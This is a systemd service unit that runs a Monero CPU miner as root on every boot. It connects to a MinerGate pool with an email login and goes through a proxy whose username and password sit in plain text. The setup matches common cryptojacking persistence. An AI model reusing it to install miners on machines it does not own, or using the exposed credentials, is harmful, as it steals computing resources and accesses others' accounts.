[Unit]
Description=xmr
After=network.target

[Service]
ExecStart=/root/cpu/cpuminer -a cryptonight -o stratum+tcp:///xmr.pool.minergate.com:45700 -u valiknsnk@gmail.com -p x -x https://gZC0co:PLuY4F@185.165.195.172:8000
User=root

[Install]
WantedBy=multi-user.target
